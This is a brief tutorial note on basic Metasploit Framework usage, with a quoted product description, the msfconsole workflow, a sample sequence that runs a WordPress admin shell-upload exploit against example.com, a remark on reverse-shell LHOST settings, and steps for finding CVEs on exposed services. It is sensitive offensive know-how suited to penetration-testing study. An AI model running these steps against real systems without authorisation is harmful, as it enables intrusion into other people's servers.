Metasploit Framework Usage

Educational Purposes Only! ‎‏‏‎ ‎‏‏‎ ‎‏‏‎ ‎‏‏‎ ‎

"The Metasploit Framework is a Ruby-based, modular penetration testing platform that enables you to write, test, and execute exploit code. The Metasploit Framework contains a suite of tools that you can use to test security vulnerabilities, enumerate networks, execute attacks, and evade detection. At its core, the Metasploit Framework is a collection of commonly used tools that provide a complete environment for penetration testing and exploit development." - https://docs.rapid7.com/metasploit/msf-overview/

Standard Usage:
1. msfconsole
2. search
3. use
4. show options (shows exploit specifics)

Example:   

use exploit/unix/webapp/wp_admin_shell_upload  
set RHOST http://example.com  
set RPORT 80  
set TARGETURI /  
exploit  

Tip: setg can set the values globally

More options:
1. show targets
2. show payloads

NOTE: when you show options, it only shows options for the module, not metasploit itself. If you are using a reverse shell, you need to set LHOST for example which isn't shown at first. Also it can be useful to specify directory

How to find CVEs:

  1. Find out the services and ports
  2. Connect to the port/service - curl, nc, ftp, ssh etc..
  3. Check if you can find versions
  4. check if there are any CVEs that include the version
  5. Check if metasploit has any modules